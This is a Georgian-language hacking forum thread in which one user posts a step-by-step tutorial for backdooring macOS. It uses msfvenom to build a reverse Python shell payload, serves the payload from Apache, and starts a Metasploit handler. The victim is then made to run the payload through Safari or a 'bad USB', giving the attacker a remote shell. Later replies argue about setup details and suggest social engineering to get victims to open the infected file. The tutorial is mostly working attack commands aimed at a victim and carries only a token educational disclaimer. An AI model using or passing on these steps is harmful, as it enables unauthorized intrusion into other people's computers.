MacOS X Backdoor Kali linux | Cyber Community | Hi-Tech World - CYBSECGROUP
Welcome to the CYBSECGROUP Forum
You have the opportunity to get acquainted with interesting projects in an interesting environment
Registration

MacOS X Backdoor Kali linux

SIMBIOS

R00T 😈
დრუიდი
Jun 24, 2018
56
103
#1
apple_backdoor.png
გამარჯობათ დღესდღეისობით ძაან ბევრი ადმიანსიგან მესმის რომ Mac OS X არის ყველაზე უსაფრთხო სისტემა. მაგრამ რატომ? ძირითადი არგუმენტი არის ის რომ Mac OS აქვს დახურული ფაილური სისტემა ხოლო Windows კი გახსნილი, რაც ნიშნავს იმას რომ ბოროტმოქმედს შეუძლია ყველა სისტემური ფაილი გახსნას დაარედაქტიროს და მოდიფიცირება გუაკეთოს. მე გაჩვენებთ თუ როგორ არის შესაძლებელი ბექდორის შექმნა მაკის სისტემაში ტერმინალის მეშვეობით.

ბექდორის შესაქმნელად გამოვიყენებთ ყველასთვის ცნობილ და საყვარელ შეღწევადობის ფრაემვორკს Metasploit ს რომელი გვეყენება Kali Linux ზე. მსხვერპლის სახით გვეყოლება macOS Mojave ვერსიით 10.14.4 ჩემს მაკბუკზე :) . ხოლო შემტევი იქნება Kali Linux ი ვირტუალ ბოხზსე დაყენებული. დაინფიცირება მოხდება შელლ ბრძანებით რომელიც პითონში იქნება დაწერილი. წარმატებული დაინფიცირების შედეგად ჩვენ წვდომა გვექნება ფაილურ სისტემაზე ასევე შევძლებთ ექსპლოატირებს ნებისმიერ რამის და ფაილების ჩატვირთვა ამოტვირთვის ფუნქციაც გვექნება.

1) გავუშვათ მეტასპლოიტი
Bash:
msfconsole
1.png
2)
Bash:
use exploit/multi/handler
GFpYN2s.png

3) ვქმნით ექსპლოიტს და ვუთითებთ ჩვენს IPv4
Bash:
msfvenom -p cmd/unix/reverse_python LHOST=YOUR IP LPORT=9090 -f rar > /root/shell.py
3.png

4) ჩვენთვის მოსახერხებლად რომ იყოს ვუშვებთ apache ის სერვერს
Bash:
 service apache2 start
4.png
5) გადავიტანოთ shell.py აპაჩში
Bash:
cp shell.py /var/www/html
5.png

6) ვაკონფიგურირებთ მეტასპლოიტს ჩვენი ვირუსისთვის და ვუშვებთ.
Bash:
set payload cmd/unix/reverse_python
set LHOST YOUR IPv4
set LPORT 9090
run
6.png

7) თუ თქვენ გაქვთ მსხვერპლის კომპიუტერთან წვდომა გახსენით safari ი და გადადით დაგენერირებულ მისამართზე ხოლო თუ არ გაქვთ წვდომა გამოიყენეთ bad usb
7.png
8) ვხსნით shell.py ის ფაილს
8.png
9) ვხედავთ გაურკვეველ ციფრებს და ასოებს base64 ფორმატში, ვაკოპირებთ და ვსვავთ ტერმინალში 9.png
10)და ვხედავთ რომ გამოჩნდა დაინფიცირებული სესია 10.png
11) ფუნქციონალი თვენს ხელთაა რომ გაიგოთ რომელ დირქტორიაში იმყოფებით ვწერთ pwd ხოლო ფაილების გასაგებად ls
11.png

მადლობა ყურადღებისთვის:)

სტატია დაწერილია შემეცნებითი მიზნებისთვის ფორუმი და ავტორი არ არის პასუხისმგებელი მის ბოროტულად გამოყენების შემთხვევაში
 
Last edited:

კახა ჯელაძე

სტუმარი
#2
ჩვენთვის მოსახერხებლად რომ იყოს ვუშვებთ apache ის სერვერს
უფრო გასაგებად რომ ვთქვათ აპაჩი უზრუნველყოფს დროებითი ვებსაიტის შექმნის მეშვეობით ლოკალჰოსტზე არსებული ექსპლოიტის მიწოდებას მსხვერპლისთვის
 

SIMBIOS

R00T 😈
დრუიდი
Jun 24, 2018
56
103
#3
უფრო გასაგებად რომ ვთქვათ აპაჩი უზრუნველყოფს დროებითი ვებსაიტის შექმნის მეშვეობით ლოკალჰოსტზე არსებული ექსპლოიტის მიწოდებას მსხვერპლისთვის
კი ვებ გვერდის მაგივრობას ვიწევს ამ შემთხვევაში:)
 

კახა ჯელაძე

სტუმარი
#4
აპაჩი კარგია მაგრამ მზგავსი შეტევის შემთხვევაში postgresql უფრო გამოდგება,სოცინჟინერიით თავად გაახსნევინებთ ინფიცირებულ ფაილს....
ფიზიკური წვდომის შემთხვევაში ეს მეთოდი დროის ფლანგვაა...
 

SIMBIOS

R00T 😈
დრუიდი
Jun 24, 2018
56
103
#5
აპაჩი კარგია მაგრამ მზგავსი შეტევის შემთხვევაში postgresql უფრო გამოდგება,სოცინჟინერიით თავად გაახსნევინებთ ინფიცირებულ ფაილს....
ფიზიკური წვდომის შემთხვევაში ეს მეთოდი დროის ფლანგვაა...
postgresql რა შუაშია აპაჩთან რო ამიხსნა თუ შეიძ₾ება აპაჩი სერვერიული მხარეა postgresql ი კი მონაცემთა ბაზა? ხოლო რაც შეეხება ფიზიკურ წვდომას მე მაგალით მოვიყვანე :)
 

კახა ჯელაძე

სტუმარი
#6
PostgreSQL მარტო ბაზა არ არის.აპაჩისთან ერთად რომ ჩართავ მეტასპლოიტით შექმნილ ექსპლოიტს საშუალებას აძლევს დააკავშიროს შემტევი კომპიუტერი მსხვერპლის კომპიუტერთან პირდაპირი კავშირით ყოველგვარი დროებითი ვებგვერდის შექმნის გარეშე
 

SIMBIOS

R00T 😈
დრუიდი
Jun 24, 2018
56
103
#7
PostgreSQL მარტო ბაზა არ არის.აპაჩისთან ერთად რომ ჩართავ მეტასპლოიტით შექმნილ ექსპლოიტს საშუალებას აძლევს დააკავშიროს შემტევი კომპიუტერი მსხვერპლის კომპიუტერთან პირდაპირი კავშირით ყოველგვარი დროებითი ვებგვერდის შექმნის გარეშე
PostgreSQL არის მონაცემთა ბაზა რომელიც იყენებს Metasploit ი და თუ შენ არ გაგაჩნია გლობალურ იპზე გახსნილი პორტი და არ გაგაჩნია ვებ სერვერი მარტო PostgreSQL ით ვერაფერს იზავ სერვერი აუცილებლობა წინააღდეგ შემთხვევაში ბექქონეთი არ გექნება
 

კახა ჯელაძე

სტუმარი
#8
იმიტომაც დავწერე რომ აპაჩისთან ერთად უნდა ჩართო
შეგიძლია მიპასუხო რაში იყენებს მეტასპლოიტი PostgreSQL-ს?
 

SIMBIOS

R00T 😈
დრუიდი
Jun 24, 2018
56
103
#9
ჩემს შემთხვევაში არ არის აუცილებელი. და Metasploit ს PostgreSQL ის გარეშეც შეუძლია იმუშაოს უბრალოდ ოპერაციები რომელიც მოითხოვს ქეშირებას (მაგალითა ძიება) უბრალოდ ცოტა დიდხანს დასჭირება დამუშავება. ხოლო Metasploit რატო იყენებს და რაში Postgre ს იმიტომ რომ მხოლოდ მასთან მუშაობს კორექტულად და იყენებს იმაში რომ შენს მიერ შექმნილი დაგენერირებული ექსპლოიტის პეილოადის და Metasploit ის მოდულების ინფორმაცია ჩაიწეროს და გაცვალოს ერათმანეთში უფრო სწრაფად სამუშასთვის.
 

კახა ჯელაძე

სტუმარი
#10
Metasploit ს PostgreSQL ის გარეშეც შეუძლია იმუშაოს უბრალოდ ოპერაციები რომელიც მოითხოვს ქეშირებას (მაგალითა ძიება) უბრალოდ ცოტა დიდხანს დასჭირება დამუშავება. ხოლო Metasploit რატო იყენებს და რაში Postgre ს იმიტომ რომ მხოლოდ მასთან მუშაობს კორექტულად და იყენებს იმაში რომ შენს მიერ შექმნილი დაგენერირებული ექსპლოიტის პეილოადის და Metasploit ის მოდულების ინფორმაცია ჩაიწეროს და გაცვალოს ერათმანეთში უფრო სწრაფად სამუშასთვის
კაი დაივიწყე...
P.S ძიების მაგალითზე ვიხალისე...